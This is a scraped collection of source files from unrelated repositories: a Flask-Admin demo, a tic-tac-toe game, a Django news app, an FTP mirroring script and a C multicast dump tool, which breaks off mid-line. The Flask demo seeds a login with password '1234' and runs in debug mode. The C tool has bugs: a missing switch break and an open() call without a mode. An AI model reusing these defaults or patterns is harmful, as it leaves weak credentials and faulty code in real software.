helpers.validate_form_on_submit(form):\n user = form.get_user()\n login.login_user(user)\n\n if 
login.current_user.is_authenticated:\n return redirect(url_for('.index'))\n self._template_args['form'] = form\n return super(MyAdminIndexView, self).index()\n\n @expose('/logout/')\n def logout_view(self):\n login.logout_user()\n return redirect(url_for('.index'))\n\ninit_login()\n\n# Create admin\nadmin = admin.Admin(app, name='Example: SQLAlchemy2',index_view=MyAdminIndexView(), base_template='my_master.html', template_mode='bootstrap3')\nadmin.add_view(CarAdmin(Car, db.session))\n\ndef build_sample_db():\n \"\"\"\n Populate a small db with some example entries.\n \"\"\"\n\n import random\n import datetime\n\n db.drop_all()\n db.create_all()\n\n # Create sample Users\n desc = [\n 'A', 'B', 'C', 'E', 'I', 'C', 'S', 'M',\n 'J', 'T', 'E', 'A', 'A', 'I', 'A', 'O', 'J',\n 'A', 'W', 'J', 'G', 'L', 'B', 'S', 'L'\n ]\n model = [\n 'Brown', 'Smith', 'Patel', 'Jones', 'Williams', 'Johnson', 'Taylor', 'Thomas',\n 'Roberts', 'Khan', 'Lewis', 'Jackson', 'Clarke', 'James', 'Phillips', 'Wilson',\n 'Ali', 'Mason', 'Mitchell', 'Rose', 'Davis', 'Davies', 'Rodriguez', 'Cox', 'Alexander'\n ]\n brand = [\n 'seat', 'citroen', 'renault', 'dig', 'juan', 'cpu', 'pol', 'Tas',\n 'nissan', 'hyundai', 'mercedes', 'Jdodge', 'manolo', 'it', 'Pips', 'Wi',\n 'wolswagen', 'skoda', 'bmw', 'Rose', 'pepe', 'ram', 'Roez', 'Cx', 'Al'\n ]\n hidden = [\n '1', '1', '1', '1', '1', '1', '1', '1',\n '2', '2', '2', '2', '2', '2', '3', '3',\n '3', '3', '3', '3', '3', '3', '3', '3', '3'\n ]\n\n car_list = []\n for i in range(len(desc)):\n car = Car()\n car.desc = desc[i]\n car.brand = brand[i].lower()\n car.hidden = hidden[i]\n car.model = model[i]\n car_list.append(car)\n db.session.add(car)\n\n user = User()\n user.login = '2'\n user.password = '1234'\n db.session.add(user)\n\n db.session.commit()\n\nif __name__ == '__main__':\n\n # Create DB\n build_sample_db()\n\n # Start app\n app.run(debug=True)\n"
}
] | 2 |
Lap343/Tick-Tack-Toe_Game | https://github.com/Lap343/Tick-Tack-Toe_Game | 15bc24374c779264ea4b6e92b7ae1bfbe92b636a | 78ae4850c2129c657eda490efba9052fb1613c7b | 05175a30a8b1b386c215e6ae1c12b476c58702b8 | refs/heads/main | 2023-03-14T09:17:07.221109 | 2021-03-02T22:04:51 | 2021-03-02T22:04:51 | 343,925,411 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4891625642776489,
"alphanum_fraction": 0.5044335126876831,
"avg_line_length": 25.835617065429688,
"blob_id": "a2c0d7a4e69814f749d8b0d07727024b2a0c6383",
"content_id": "9760a6c7feb8699ef206f278836bf5e3511c5b66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2030,
"license_type": "no_license",
"max_line_length": 347,
"num_lines": 73,
"path": "/game.py",
"repo_name": "Lap343/Tick-Tack-Toe_Game",
"src_encoding": "UTF-8",
"text": "restart_check = True\r\nog_game_board = ['1','2','3','4','5','6','7','8','9']\r\n\r\ndef display_game(game_board):\r\n print(f' | | \\n {game_board[0]} | {game_board[1]} | {game_board[2]} \\n | | \\n-----------------\\n | | \\n {game_board[3]} | {game_board[4]} | {game_board[5]} \\n | | \\n-----------------\\n | | \\n {game_board[6]} | {game_board[7]} | {game_board[8]} \\n | | \\n')\r\n\r\ndef player_input():\r\n choice = 'WRONG'\r\n\r\n while choice not in game_board:\r\n choice = input('Please choose a cell to change: ')\r\n if choice not in game_board and og_game_board:\r\n print('Please choose one of the numbers on the grid.')\r\n \r\n return int(choice) - 1\r\n\r\ndef turn_check(turn):\r\n if turn == True:\r\n return False\r\n else:\r\n return True\r\n\r\ndef replacement_choice(game_board,index_change,turn):\r\n if turn == True:\r\n game_board[index_change] = 'X'\r\n else:\r\n game_board[index_change] = 'O'\r\n\r\n return game_board\r\n\r\ndef gameon_check(turn_counter):\r\n if turn_counter < 9:\r\n print(turn_counter)\r\n return True\r\n else: \r\n return False\r\n\r\ndef restart_checking():\r\n choice = 'wrong'\r\n while choice not in ['Y','N']:\r\n choice = input('Play again? (Y or N) ')\r\n if choice not in ['Y','N']:\r\n print(\"Don't understand? Please choose 'Y' or 'N'\")\r\n\r\n if choice == 'Y':\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\nwhile restart_check == True:\r\n game_board = ['1','2','3','4','5','6','7','8','9']\r\n game_on = True\r\n turn_counter = 1\r\n turn = True\r\n \r\n display_game(og_game_board)\r\n\r\n while game_on:\r\n index_change = player_input()\r\n\r\n game_board = replacement_choice(game_board,index_change,turn)\r\n\r\n turn = turn_check(turn)\r\n\r\n display_game(game_board)\r\n\r\n game_on = gameon_check(turn_counter)\r\n\r\n turn_counter += 1\r\n\r\n restart_check = restart_checking()"
},
{
"alpha_fraction": 0.7543859481811523,
"alphanum_fraction": 0.7543859481811523,
"avg_line_length": 56,
"blob_id": "89c147a1b3f235470b5319f23cbb4e21c5442709",
"content_id": "47607fb6781d08b0f7bc5e114e385b8672e4e18f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 114,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Lap343/Tick-Tack-Toe_Game",
"src_encoding": "UTF-8",
"text": "# Tick-Tack-Toe_Game\nA tick-tack-toe game you play with someone else. You need to run it on the terminal to play.\n"
}
] | 2 |
denasanay/TestWork | https://github.com/denasanay/TestWork | b69c433f888bec0619e10f4ce6123b9f27a863df | ea380c2dd6123e55bbc60361831088c0f0a4c56e | e43790ba6d3636f4331f95b10b922ebd04b6d140 | refs/heads/master | 2016-08-11T12:04:47.106726 | 2015-05-20T19:27:12 | 2015-05-20T19:27:12 | 35,963,464 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6649746298789978,
"alphanum_fraction": 0.6649746298789978,
"avg_line_length": 31.83333396911621,
"blob_id": "5261ca11694a54ce5206889a76e433ae258c777f",
"content_id": "9b4d2378956f44a5fe7d93496ea89b9bb6d091bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 6,
"path": "/core/urls.py",
"repo_name": "denasanay/TestWork",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import include, url, patterns\n\nurlpatterns = patterns(\n 'core.views',\n url(r'^articles/(?P<article_id>\\d+)/$', 'article_detail_view', name='article_detail_view'),\n )\n"
},
{
"alpha_fraction": 0.6859503984451294,
"alphanum_fraction": 0.6883116960525513,
"avg_line_length": 29.178571701049805,
"blob_id": "4b050e56d76bb9944c65cbd45b11defa1e6d14f1",
"content_id": "f6e0a9a2e865d451db0606bc4e2cdd93101eaa47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 847,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 28,
"path": "/core/views.py",
"repo_name": "denasanay/TestWork",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Article\nimport xml.etree.cElementTree as ET\nimport urllib3\n\n\ndef articles_list_view(request):\n articles_list = Article.objects.all()\n return render(request, 'articles_list.html', {'articles_list': articles_list})\n\n\ndef article_detail_view(request, article_id):\n article = Article.objects.get(id=article_id)\n return render(request, 'detail.html', {'article': article})\n\n\ndef article_parse(request):\n http = urllib3.PoolManager()\n xml_file = http.urlopen('GET', 'http://feeds.abcnews.com/abcnews/internationalheadlines', preload_content=False)\n tree = ET.ElementTree(file=xml_file)\n xmldata = []\n\n for elem in tree.iter(tag='title'):\n xmldata.append({\n 'title': elem.text,\n })\n\n return render(request, 'parse.html', {'items': xmldata})\n\n\n"
},
{
"alpha_fraction": 0.6395348906517029,
"alphanum_fraction": 0.6395348906517029,
"avg_line_length": 34.75,
"blob_id": "294ed830b941e14c6f3d4407cd6e3dc6a43fdf61",
"content_id": "797111ddebad447f07dd220ab3f77c2724cce6bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 12,
"path": "/TestWork/urls.py",
"repo_name": "denasanay/TestWork",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import include, url, patterns\nfrom django.contrib import admin\n\nurlpatterns = patterns(\n '',\n url(r'^$', 'core.views.articles_list_view', name='articles_list_view'),\n url(r'^parse/$', 'core.views.article_parse', name='article_parse'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^auth/', include('loginsys.urls')),\n url(r'^add/', include('core.urls', namespace='core')),\n\n )\n\n"
},
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.7568627595901489,
"avg_line_length": 27.44444465637207,
"blob_id": "87420c3723e9b7ac638d4d0dc0af1074797176e4",
"content_id": "92ff8fcc292b9c877f80e220fca169818148f8c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/core/models.py",
"repo_name": "denasanay/TestWork",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.conf import settings\n# Create your models here.\n\n\nclass Article(models.Model):\n title = models.CharField(max_length=255)\n description = models.CharField(max_length=255)\n created_at = models.DateTimeField()"
},
{
"alpha_fraction": 0.5188171863555908,
"alphanum_fraction": 0.5188171863555908,
"avg_line_length": 36.20000076293945,
"blob_id": "0f2e41dd7445f4521a45541859864856ab6dc7e6",
"content_id": "9c0e239a3d463a2180f89300717d7c405b7b25cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 10,
"path": "/loginsys/urls.py",
"repo_name": "denasanay/TestWork",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('',\n\n\n url(r'^login/$', 'loginsys.views.login', name='user_login'),\n url(r'^logout/$', 'loginsys.views.logout', name='user_logout'),\n url(r'^register/$', 'loginsys.views.register', name='user_register'),\n\n )\n"
}
] | 5 |
dduval/userspacecode | https://github.com/dduval/userspacecode | 8cca6cf2f39d27281a30081534a931bbb5ce0037 | e46c82f67c07f967a5ad264b03e9a6e9405aec3b | 6751c2749e77381c3c5d44ad3addda9cec190e9d | refs/heads/master | 2016-09-06T06:46:37.975544 | 2014-02-03T20:37:20 | 2014-02-03T20:37:20 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5436164140701294,
"alphanum_fraction": 0.5519930720329285,
"avg_line_length": 25.427480697631836,
"blob_id": "88e681ebe0d71fe1c340d09615e798b474117304",
"content_id": "3bc86cb6debb73c7166b1490ceda9d8d8c6f2138",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3462,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 131,
"path": "/python/ftpsync.py",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\n\n\"\"\" Mirror a remote ftp dir into a local directory tree (files only)\n\nftpsync.py -s <ftpsite> -f <ftpdir> -l <localdir> -p <pattern>\n\nExample:\n\n ./ftpsync.py -s ftp.redhat.com -f /pub/redhat/linux/updates/enterprise/4AS/en/os/SRPMS/ -l /tmp/ -p kernel-utils*\n\"\"\"\n\n# Copyright Dominic Duval <[email protected]> according to the terms\n# of the GNU Public License.\n \nimport os\nimport sys\nimport getopt\nimport ftplib\nfrom fnmatch import fnmatch\n\n# Print usage message and exit\ndef usage():\n sys.stdout = sys.stderr\n print __doc__\n sys.exit(2)\n\ndef ftpsync(ftphost,remotedir,localdir,pattern):\n verbose=2\n login='anonymous'\n passwd='[email protected]'\n account=''\n host='ftp.redhat.com'\n\n \n f = ftplib.FTP()\n if verbose > 1: print \"Connecting to '%s'...\" % host\n f.connect(host)\n if verbose > 1:\n print 'Logging in as %r...' % (login or 'anonymous')\n f.login(login, passwd, account)\n pwd = f.pwd()\n f.cwd(remotedir)\n pwd = f.pwd()\n if verbose > 1: print 'PWD =', repr(pwd)\n\n if localdir and not os.path.isdir(localdir):\n if verbose > 1: print 'Creating local directory', repr(localdir)\n try:\n makedir(localdir)\n except os.error, msg: \n print \"Failed to establish local directory\", repr(localdir)\n return\n\n listing = []\n f.retrlines('LIST', listing.append)\n\n for line in listing:\n if verbose > 3: print 'processing %s' % line\n words = line.split(None, 8)\n if len(words) < 6:\n if verbose > 1: print 'Skipping short line'\n continue\n filename = words[-1].lstrip()\n infostuff = words[-5:-1]\n mode = words[0]\n\n # See if the file matches our pattern\n if verbose > 3: print \"%s %s\" % (filename, pattern)\n if not fnmatch(filename, pattern):\n continue\n if verbose > 1: print 'Match for %s' % filename\n if mode[0] == 'd':\n continue\n if mode[0] == 'l':\n continue\n\n fullname = os.path.join(localdir, filename)\n #Create new file and retreive content\n if os.path.isfile(fullname):\n if verbose > 1: print '%s already exists' % fullname\n continue\n try:\n fp = open( fullname , 'wb')\n except IOError, msg:\n print \"Can't create %r: %s\" % (filename, msg)\n continue\n if verbose > 1:\n print 'Retrieving %r from %r ...' % (filename, pwd) \n try:\n f.retrbinary('RETR ' + filename, fp.write, 8*1024)\n except ftplib.error_perm, msg:\n print msg\n fp.close()\n return len(listing) \n\n\ndef main(args):\n ftpsite=''\n ftpdir=''\n localdir=''\n pattern=''\n try:\n opts, args = getopt.getopt(args,\"hs:f:l:p:\")\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n usage() \n sys.exit()\n elif opt in (\"-s\"):\n ftpsite = arg\n elif opt in (\"-f\"):\n ftpdir = arg\n elif opt in (\"-l\"):\n localdir = arg\n elif opt in (\"-p\"):\n pattern = arg\n\n print 'FTP site is', ftpsite\n print 'FTP directory is', ftpdir\n print 'Local directory is', localdir\n print 'Search pattern is', pattern\n \n ftpsync(ftpsite, ftpdir, localdir, pattern)\n\n\nif __name__ == \"__main__\":\n verbose=2\n main(sys.argv[1:])\n"
},
{
"alpha_fraction": 0.571353554725647,
"alphanum_fraction": 0.5918403267860413,
"avg_line_length": 23.504291534423828,
"blob_id": "1651534a8d87fde10103ba34fbc078463275c776",
"content_id": "e43bbb110cf03864038defb28f455ff14544da9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 11422,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 466,
"path": "/multidump.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2009 Dominic Duval, Red Hat Inc.\n *\n * multidump :\n * Receive multicast messages based on command line arguments\n *\n * USAGE: ./multidump\n *\n * EXAMPLE: ./mdump -p0 -Q2 -r200000 224.0.55.55 12965\n *\n * Inspired from 29West.com's msend and mdump\n */\n\n\n\n#include <stdio.h>\n#include <stdlib.h>\n\nextern int optind;\nextern int optreset;\nextern char *optarg;\nint getopt(int nargc, char * const *nargv, const char *ostr);\n\n#include <signal.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <sys/socket.h>\n#include <arpa/inet.h>\n#include <errno.h>\n#include <pthread.h>\n#define SLEEP_SEC(s) sleep(s)\n#define SLEEP_MSEC(s) usleep((s) * 1000)\n#define SLEEP_USEC(s) usleep(s)\n#define CLOSESOCKET close\n#define ERRNO errno\n#define SOCKET int\n#define INVALID_SOCKET -1\n#define SOCKET_ERROR -1\n#define TLONGLONG signed long long\n\n#include <sys/time.h>\n\n#include <string.h>\n#include <time.h>\n\n#define MAXPDU 65536\n\n\n/* program name (from argv[0] */\nchar *prog_name = \"xxx\";\n\n/* program options */\nint o_quiet_lvl;\nint o_rcvbuf_size;\nint o_pause_ms;\nint o_verify;\nint o_stop;\nint o_log;\n\n/* program positional parameters */\nunsigned long int groupaddr;\nunsigned short int groupport;\nchar *bind_if;\n\n\nchar usage_str[] = \"[-h] [-q] [-Q Quiet_lvl] [-r rcvbuf_size] [-p pause_ms] [-v] [-s] group port [interface]\";\n\nvoid usage(char *msg)\n{\n\tif (msg != NULL)\n\t\tfprintf(stderr, \"\\n%s\\n\\n\", msg);\n\tfprintf(stderr, \"Usage: %s %s\\n\\n\"\n\t\t\t\"(use -h for detailed help)\\n\",\n\t\t\tprog_name, usage_str);\n} /* usage */\n\n\nvoid help(char *msg)\n{\n\tif (msg != NULL)\n\t\tfprintf(stderr, \"\\n%s\\n\\n\", msg);\n\tfprintf(stderr, \"Usage: %s %s\\n\", prog_name, usage_str);\n\tfprintf(stderr, \"Where:\\n\"\n\t\t\t\" -h : help\\n\"\n\t\t\t\" -q : no print per datagram (same as '-Q 2')\\n\"\n\t\t\t\" -Q Quiet_lvl : set quiet level [0] :\\n\"\n\t\t\t\" 0 - print full datagram contents\\n\"\n\t\t\t\" 1 - print datagram summaries\\n\"\n\t\t\t\" 2 - no print per datagram (same as '-q')\\n\"\n\t\t\t\" -r rcvbuf_size : size (bytes) of UDP receive buffer (SO_RCVBUF) [4194304]\\n\"\n\t\t\t\" (use 0 for system default buff size)\\n\"\n\t\t\t\" -p pause_ms : milliseconds to pause after each receive [0 : no pause]\\n\"\n\t\t\t\" -v : verify the sequence numbers\\n\"\n\t\t\t\" -s : stop execution when status msg received\\n\"\n\t\t\t\" -l : log packets\\n\"\n\t\t\t\"\\n\"\n\t\t\t\" group : multicast address to send on\\n\"\n\t\t\t\" port : destination port\\n\"\n\t\t\t\" interface : optional IP addr of local interface (for multi-homed hosts) [INADDR_ANY]\\n\"\n\t);\n} /* help */\n\n\n/* faster routine to replace inet_ntoa() (from tcpdump) */\nchar *intoa(unsigned int addr)\n{\n\tregister char *cp;\n\tregister unsigned int byte;\n\tregister int n;\n\tstatic char buf[sizeof(\".xxx.xxx.xxx.xxx\")];\n\n\taddr = ntohl(addr);\n\t// NTOHL(addr);\n\tcp = &buf[sizeof buf];\n\t*--cp = '\\0';\n\n\tn = 4;\n\tdo {\n\t\tbyte = addr & 0xff;\n\t\t*--cp = byte % 10 + '0';\n\t\tbyte /= 10;\n\t\tif (byte > 0) {\n\t\t\t*--cp = byte % 10 + '0';\n\t\t\tbyte /= 10;\n\t\t\tif (byte > 0)\n\t\t\t\t*--cp = byte + '0';\n\t\t}\n\t\t*--cp = '.';\n\t\taddr >>= 8;\n\t} while (--n > 0);\n\n\treturn cp + 1;\n} /* intoa */\n\n\nchar *format_time(const struct timeval *tv)\n{\n\tstatic char buff[sizeof(\".xx:xx:xx.xxxxxx\")];\n\tint min;\n\n\tunsigned int h = localtime((time_t *)&tv->tv_sec)->tm_hour;\n\tmin = (int)(tv->tv_sec % 
86400);\n\tsprintf(buff,\"%02d:%02d:%02d.%06d\",h,(min%3600)/60,min%60,tv->tv_usec);\n\treturn buff;\n} /* format_time */\n\n\nvoid dump(const char *buffer, int size)\n{\n\tint i,j;\n\tunsigned char c;\n\tchar textver[20];\n\n\tfor (i=0;i<(size >> 4);i++) {\n\t\tfor (j=0;j<16;j++) {\n\t\t\tc = buffer[(i << 4)+j];\n\t\t\tprintf(\"%02x \",c);\n\t\t\ttextver[j] = ((c<0x20)||(c>0x7e))?'.':c;\n\t\t}\n\t\ttextver[j] = 0;\n\t\tprintf(\"\\t%s\\n\",textver);\n\t}\n\tfor (i=0;i<size%16;i++) {\n\t\tc = buffer[size-size%16+i];\n\t\tprintf(\"%02x \",c);\n\t\ttextver[i] = ((c<0x20)||(c>0x7e))?'.':c;\n\t}\n\tfor (i=size%16;i<16;i++) {\n\t\tprintf(\" \");\n\t\ttextver[i] = ' ';\n\t}\n\ttextver[i] = 0;\n\tprintf(\"\\t%s\\n\",textver);\n\tfflush(stdout);\n} /* dump */\n\n\nvoid currenttv(struct timeval *tv)\n{\n\tgettimeofday(tv,NULL);\n} /* currenttv */\n\n\nint main(int argc, char **argv)\n{\n\tint opt;\n\tint num_parms;\n\tchar equiv_cmd[1024];\n\tchar *buff;\n\tSOCKET sock;\n\tsocklen_t fromlen = sizeof(struct sockaddr_in);\n\tint default_rcvbuf_sz, cur_size, sz;\n\tint num_rcvd;\n\tstruct sockaddr_in name;\n\tstruct sockaddr_in src;\n\tstruct ip_mreq imr;\n\tstruct timeval tv;\n\tint num_sent;\n\tfloat perc_loss;\n\tint cur_seq;\n\tstruct iovec iov;\n\tssize_t iovnr;\n\tint iovfd;\n\tchar strbuffer[1000];\n\n\tprog_name = argv[0];\n\n\n\tif (o_log == 1) {\n\t\tiov.iov_base=strbuffer;\n\t\tiov.iov_len=0; //To be defined latter.\n\t\tiovfd= open (\"log.out\", O_WRONLY | O_CREAT | O_TRUNC);\n\t\tif (iovfd == -1) {\n\t\t\tperror (\"open error\");\n\t\t\texit(1);\n\t\t}\n\t}\n\n\n\tbuff = malloc(65536 + 1); /* one extra for trailing null (if needed) */\n\tif (buff == NULL) { fprintf(stderr, \"malloc failed\\n\"); exit(1); }\n\n\tsignal(SIGPIPE, SIG_IGN);\n\n\tif((sock = socket(PF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {\n\t\tfprintf(stderr, \"ERROR: \"); perror(\"socket\");\n\t\texit(1);\n\t}\n\tsz = sizeof(default_rcvbuf_sz);\n\tif (getsockopt(sock,SOL_SOCKET,SO_RCVBUF,(char *)&default_rcvbuf_sz,\n\t\t\t(unsigned int *)&sz) == SOCKET_ERROR) {\n\t\tfprintf(stderr, \"ERROR: \"); perror(\"getsockopt - SO_RCVBUF\");\n\t\texit(1);\n\t}\n\n\t/* default values for options */\n\to_quiet_lvl = 0;\n\to_rcvbuf_size = 0x400000; /* 4MB */\n\to_pause_ms = 0;\n\to_verify = 0;\n\to_stop = 0;\n\to_log = 0;\n\n\t/* default values for optional positional params */\n\tbind_if = NULL;\n\n\twhile ((opt = getopt(argc, argv, \"hqQ:p:r:vsl\")) != EOF) {\n\t\tswitch (opt) {\n\t\t case 'h':\n\t\t\thelp(NULL); exit(0);\n\t\t\tbreak;\n\t\t case 'q':\n\t\t\to_quiet_lvl = 2;\n\t\t\tbreak;\n\t\t case 'Q':\n\t\t\to_quiet_lvl = atoi(optarg);\n\t\t\tbreak;\n\t\t case 'p':\n\t\t\to_pause_ms = atoi(optarg);\n\t\t\tbreak;\n\t\t case 'r':\n\t\t\to_rcvbuf_size = atoi(optarg);\n\t\t\tif (o_rcvbuf_size == 0)\n\t\t\t\to_rcvbuf_size = default_rcvbuf_sz;\n\t\t\tbreak;\n\t\t case 'v':\n\t\t\to_verify = 1;\n\t\t\tbreak;\n\t\t case 's':\n\t\t\to_stop = 1;\n\t\t\tbreak;\n\t\t case 'l':\n\t\t\to_log = 1;\n\t\t default:\n\t\t\tusage(\"unrecognized option\");\n\t\t\texit(1);\n\t\t\tbreak;\n\t\t} /* switch */\n\t} /* while opt */\n\n\tnum_parms = argc - optind;\n\t\n\tif (o_log == 1) {\n\t\tiov.iov_base=strbuffer;\n\t\tiov.iov_len=0; //To be defined latter.\n\t\tiovfd= open (\"log.out\", O_WRONLY | O_CREAT | O_TRUNC);\n\t\tif (iovfd == -1) {\n\t\t\tperror (\"open error\");\n\t\t\texit(1);\n\t\t}\n\t}\n\n\n\t/* handle positional parameters */\n\tif (num_parms == 2) {\n\t\tgroupaddr = inet_addr(argv[optind]);\n\t\tgroupport = (unsigned 
short)atoi(argv[optind+1]);\n\t\tsprintf(equiv_cmd, \"mdump -p%d -Q%d -r%d %s%s%s %s\",\n\t\t\t\to_pause_ms, o_quiet_lvl, o_rcvbuf_size,\n\t\t\t\to_verify ? \"-v \" : \"\",\n\t\t\t\to_stop ? \"-s \" : \"\",\n\t\t\t\targv[optind],argv[optind+1]);\n\t\tprintf(\"Equiv cmd line: %s\\n\", equiv_cmd);\n\t\tfflush(stdout);\n\t\tfprintf(stderr, \"Equiv cmd line: %s\\n\", equiv_cmd);\n\t\tfflush(stderr);\n\t} else if (num_parms == 3) {\n\t\tgroupaddr = inet_addr(argv[optind]);\n\t\tgroupport = (unsigned short)atoi(argv[optind+1]);\n\t\tbind_if = argv[optind+2];\n\t\tsprintf(equiv_cmd, \"mdump -p%d -Q%d -r%d %s%s %s %s\",\n\t\t\t\to_pause_ms, o_quiet_lvl, o_rcvbuf_size,\n\t\t\t\to_verify ? \"-v \" : \"\",\n\t\t\t\targv[optind],argv[optind+1],argv[optind+2]);\n\t\tprintf(\"Equiv cmd line: %s\\n\", equiv_cmd);\n\t\tfflush(stdout);\n\t\tfprintf(stderr, \"Equiv cmd line: %s\\n\", equiv_cmd);\n\t\tfflush(stderr);\n\t} else {\n\t\tusage(\"need 2-3 positional parameters\");\n\t\texit(1);\n\t}\n\n\tif(setsockopt(sock,SOL_SOCKET,SO_RCVBUF,(const char *)&o_rcvbuf_size,\n\t\t\tsizeof(o_rcvbuf_size)) == SOCKET_ERROR) {\n\t\tprintf(\"WARNING: setsockopt - SO_RCVBUF\\n\");\n\t\tfflush(stdout);\n\t\tfprintf(stderr, \"WARNING: \"); perror(\"setsockopt - SO_RCVBUF\");\n\t\tfflush(stderr);\n\t}\n\tsz = sizeof(cur_size);\n\tif (getsockopt(sock,SOL_SOCKET,SO_RCVBUF,(char *)&cur_size,\n\t\t\t(unsigned int *)&sz) == SOCKET_ERROR) {\n\t\tfprintf(stderr, \"ERROR: \"); perror(\"getsockopt - SO_RCVBUF\");\n\t\texit(1);\n\t}\n\tif (cur_size < o_rcvbuf_size) {\n\t\tprintf(\"WARNING: tried to set SO_RCVBUF to %d, only got %d\\n\",\n\t\t\t\to_rcvbuf_size, cur_size);\n\t\tfflush(stdout);\n\t\tfprintf(stderr, \"WARNING: tried to set SO_RCVBUF to %d, only got %d\\n\",\n\t\t\t\to_rcvbuf_size, cur_size);\n\t\tfflush(stderr);\n\t}\n\n\tmemset((char *)&imr,0,sizeof(imr));\n\timr.imr_multiaddr.s_addr = groupaddr;\n\tif (bind_if != NULL) {\n\t\timr.imr_interface.s_addr = inet_addr(bind_if);\n\t} else {\n\t\timr.imr_interface.s_addr = htonl(INADDR_ANY);\n\t}\n\n\topt = 1;\n\tif (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (char *)&opt, sizeof(opt)) == SOCKET_ERROR) {\n\t\tfprintf(stderr, \"ERROR: \"); perror(\"setsockopt SO_REUSEADDR\");\n\t\texit(1);\n\t}\n\n\tmemset((char *)&name,0,sizeof(name));\n\tname.sin_family = AF_INET;\n\tname.sin_addr.s_addr = groupaddr;\n\tname.sin_port = htons(groupport);\n\tif (bind(sock,(struct sockaddr *)&name,sizeof(name)) == SOCKET_ERROR) {\n\t\tname.sin_addr.s_addr = htonl(INADDR_ANY);\n\t\tif (bind(sock,(struct sockaddr *)&name, sizeof(name)) == -1) {\n\t\t\tfprintf(stderr, \"ERROR: \"); perror(\"bind\");\n\t\t\texit(1);\n\t\t}\n\t}\n\n\tif (setsockopt(sock,IPPROTO_IP,IP_ADD_MEMBERSHIP,\n\t\t\t\t(char *)&imr,sizeof(struct ip_mreq)) == SOCKET_ERROR ) {\n\t\tfprintf(stderr, \"ERROR: \"); perror(\"setsockopt - IP_ADD_MEMBERSHIP\");\n\t\texit(1);\n\t}\n\n\tcur_seq = 0;\n\tnum_rcvd = 0;\n\tfor (;;) {\n\t\tcur_size = recvfrom(sock,buff,65536,0,\n\t\t\t\t(struct sockaddr *)&src,&fromlen);\n\t\tif (cur_size == SOCKET_ERROR) {\n\t\t\tfprintf(stderr, \"ERROR: \"); perror(\"recv\");\n\t\t\texit(1);\n\t\t}\n\n\t\tif (o_log == 1 ) {\n\t\t\tcurrenttv(&tv);\n\t\t\tsprintf(strbuffer, \"%s %s.%d %d bytes:\\n\",\n\t\t\t\tformat_time(&tv), inet_ntoa(src.sin_addr),\n\t\t\t\tntohs(src.sin_port), cur_size);\n\t\t\t\n\t\t}\n\n\t\tif (o_quiet_lvl == 0) { /* non-quiet: print full dump */\n\t\t\tcurrenttv(&tv);\n\t\t\tprintf(\"%s %s.%d %d bytes:\\n\",\n\t\t\t\t\tformat_time(&tv), 
inet_ntoa(src.sin_addr),\n\t\t\t\t\tntohs(src.sin_port), cur_size);\n\t\t\tdump(buff,cur_size);\n\t\t}\n\t\tif (o_quiet_lvl == 1) { /* semi-quiet: print datagram summary */\n\t\t\tcurrenttv(&tv);\n\t\t\tprintf(\"%s %s.%d %d bytes\\n\", /* no colon */\n\t\t\t\t\tformat_time(&tv), inet_ntoa(src.sin_addr),\n\t\t\t\t\tntohs(src.sin_port), cur_size);\n\t\t\tfflush(stdout);\n\t\t}\n\n\t\tif (o_pause_ms > 0) {\n\t\t\tSLEEP_USEC(o_pause_ms);\n\t\t}\n\n\t\tif (cur_size > 5 && memcmp(buff, \"echo \", 5) == 0) {\n\t\t\t/* echo command */\n\t\t\tbuff[cur_size] = '\\0'; /* guarantee trailing null */\n\t\t\tif (buff[cur_size - 1] == '\\n')\n\t\t\t\tbuff[cur_size - 1] = '\\0'; /* strip trailing nl */\n\t\t\tprintf(\"%s\\n\", buff);\n\t\t\tfflush(stdout);\n\t\t\tfprintf(stderr, \"%s\\n\", buff);\n\t\t\tfflush(stderr);\n\t\t}\n\t\telse if (cur_size > 5 && memcmp(buff, \"stat \", 5) == 0) {\n\t\t\t/* when sender tells us to, calc and print stats */\n\t\t\tbuff[cur_size] = '\\0'; /* guarantee trailing null */\n\t\t\t/* 'stat' message contains num msgs sent */\n\t\t\tnum_sent = atoi(&buff[5]);\n\t\t\tperc_loss = (float)(num_sent - num_rcvd) * 100.0 / 